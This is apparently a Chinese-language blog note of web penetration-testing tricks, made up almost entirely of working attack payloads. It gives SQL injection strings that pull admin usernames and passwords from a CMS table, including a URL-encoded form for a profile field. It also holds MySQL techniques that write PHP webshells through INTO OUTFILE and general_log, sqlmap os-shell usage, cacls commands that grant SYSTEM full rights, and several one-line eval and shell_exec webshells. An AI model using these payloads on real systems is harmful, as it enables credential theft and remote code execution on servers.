安全

web--杂烩

2019-06-16  本文已影响9人  Hf1dw

这个笔记有点乱

0x01 cms

' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) FROM c_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b#

<b>会员资料修改处的 SQL 注入
修改资料时burp一下,然后payload,url编码后的payload插入至truename与%5D之间
payload:%60%3D%28select%20group_concat%28username%2C0x3a%2Cpassword%29%20from%20c_admin%20where%20id%3D1%29%23
即:

`=(select group_concat(username,0x3a,password) from c_admin where id=1)#

0x02 get shell

1、cacls + 文件名
查看某一文件的访问控制列表
2、whoami
查看用户名
3、type + 文件名
查看文件内容
4、cacls + 文件名 + /E /P system:F /C
//将system的权限换为F,并且在出现拒绝访问错误时继续。

0x03 SQL

<1>通过phpmyadmin登陆执行导出获取
select '<?php @eval($_POST["pass"]);?>'INTO OUTFILE 'www文件路径/a.php'

<2>general_log配置文件获取
show global variable like "%genera%";   //查看genera文件配置情况
set global general_log=off;     //关闭general_log
set global general_log='on';    //通过general_log选项来获取webshell
SET global general_log_file='www文件路径/cmd.php';
SELECT '<?php assert($_POST["cmd"]);?>';

<3>sqlmap os-shell获取    //对于root账号,可以通过其来获取webshell
sqlmap -u url --os-shell        
/*物理路径获取*/
info.php来获取www文件路径

0x04 渗透

<?php 
echo '>1';
?>


<?php
 $a="${phpinfo()}";
echo "$a";
?>



<?php
if(strlen($_GET[1])<9){
     echo shell_exec($_GET[1]);
}
?>

<?php @eval($_POST[value]);?>

<?php eval($_GET["cmd"]);?>
上一篇下一篇

猜你喜欢

热点阅读